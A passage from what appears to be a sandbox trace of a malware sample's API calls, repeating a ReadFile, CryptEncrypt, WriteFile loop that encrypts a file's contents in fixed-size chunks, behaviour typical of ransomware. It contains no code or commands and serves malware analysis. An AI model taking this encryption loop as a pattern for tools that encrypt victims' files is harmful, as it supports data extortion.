pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.094] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.094] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.095] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.095] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.095] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.095] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.095] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.095] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.095] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.095] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.095] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.095] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.096] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.096] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.096] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.096] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.096] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.096] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.097] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.097] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.097] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.097] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.097] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.097] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.097] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.097] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.098] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.098] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.098] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.098] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.098] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.098] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.098] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.098] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.099] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.099] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.099] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.099] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.099] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.099] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.101] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.102] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.102] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.102] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.102] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.102] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.102] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.102] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.103] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.103] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.103] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.103] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.103] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.103] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.103] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.103] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.103] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.103] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.104] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.104] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.104] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.104] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.104] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.104] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.104] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.104] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.105] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.105] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.105] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.105] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, 